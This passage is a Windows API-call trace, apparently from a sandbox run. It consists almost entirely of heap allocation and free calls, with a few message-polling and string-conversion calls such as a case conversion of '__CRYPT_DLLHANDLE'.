hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0137.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0137.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0137.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0137.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0137.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0137.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0137.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0137.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0137.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0137.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0137.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0137.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0137.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0137.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0137.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d78 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0137.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0137.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0137.636] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0137.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0137.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0137.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d78 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0137.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e68 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0137.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0137.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0137.640] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0137.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0137.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 